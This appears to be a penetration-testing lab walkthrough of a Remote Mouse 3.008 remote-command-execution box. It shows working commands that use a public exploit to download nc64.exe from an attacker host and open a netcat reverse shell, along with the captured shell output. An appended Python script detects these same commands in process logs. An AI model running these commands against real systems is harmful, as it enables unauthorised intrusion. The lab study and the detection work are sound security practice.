Remote Mouse RCE


The target Remote Mouse instance appears to be vulnerable to arbitrary command execution, as it matches the description. The version information has not been confirmed yet.

Exploit


The author included the exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ git clone https://github.com/p0dalirius/RemoteMouse-3.008-Exploit

Cloning the exploit repo

Exploitation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ python3 RemoteMouse-3.008-Exploit/RemoteMouse-3.008-Exploit.py --target-ip $IP --cmd 'powershell -ep bypass -nop -c iwr -Uri http://192.168.45.155/nc64.exe -OutFile C:\\Windows\\Temp\\nc64.exe' 

Delivering the Netcat binary

hit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ python3 RemoteMouse-3.008-Exploit/RemoteMouse-3.008-Exploit.py --target-ip $IP --cmd 'C:\\Windows\\Temp\\nc64.exe 192.168.45.155 443 -e cmd'

Invoking…

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ nnc 443 
listening on [any] 443 ...
connect to [192.168.45.155] from (UNKNOWN) [192.168.239.199] 52564
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
 
C:\Users\divine> powershell -ep bypass -nop
 powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\Users\divine> whoami
whoami
remote-pc\divine
PS C:\Users\divine> hostname
hostname
Remote-PC
PS C:\Users\divine> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.239.199
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.239.254

Initial Foothold established to the target system as the divine user via exploiting
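
A defender's view of the two commands above, as an added example (not part of the original notes or of the exploit repository): a small triage pass over process-creation records that flags a PowerShell download into C:\Windows\Temp and a binary in that directory started with a netcat-style `-e cmd` argument. The event records, field names and rule names are constructed for illustration; the record shape is an assumption loosely modelled on Sysmon Event ID 1.

```python
import re

# Constructed process-creation records (assumed shape, loosely Sysmon Event ID 1).
# The first two command lines mirror the walkthrough, doubled backslashes included.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ep bypass -nop -c iwr -Uri http://192.168.45.155/nc64.exe -OutFile C:\\Windows\\Temp\\nc64.exe"},
    {"image": r"C:\Windows\Temp\nc64.exe",
     "cmdline": r"C:\\Windows\\Temp\\nc64.exe 192.168.45.155 443 -e cmd"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -Command Get-Service"},
    {"image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig"},
]

# Hypothetical rule patterns, all case-insensitive.
POLICY_BYPASS = re.compile(r"(?i)\s-(ep|exec|executionpolicy)\s+bypass\b")
WEB_DOWNLOAD = re.compile(r"(?i)\b(iwr|wget|curl|invoke-webrequest)\b.*\s-outfile\s+(\S+)")
# Tolerate repeated separators: C:\\Windows\\Temp\\ resolves to the same directory.
TEMP_DIR = re.compile(r"(?i)^c:\\+windows\\+temp\\+")
SHELL_HANDOFF = re.compile(r"(?i)\s-e\s+(cmd|cmd\.exe|powershell|powershell\.exe)\b")

def classify(event):
    """Return the names of the rules a single process-creation record trips."""
    hits = []
    cmd = event["cmdline"]
    download = WEB_DOWNLOAD.search(cmd)
    if download and TEMP_DIR.match(download.group(2).strip("\"'")):
        hits.append("download_to_windows_temp")
        if POLICY_BYPASS.search(cmd):
            hits.append("execution_policy_bypass")
    if TEMP_DIR.match(event["image"]) and SHELL_HANDOFF.search(cmd):
        hits.append("temp_binary_shell_handoff")
    return hits

def triage(events):
    """Map event index -> tripped rules, skipping events that trip none."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", ", ".join(rules))
```

Both rules key on the staging directory rather than on the tool name, so a renamed binary dropped into C:\Windows\Temp still trips them.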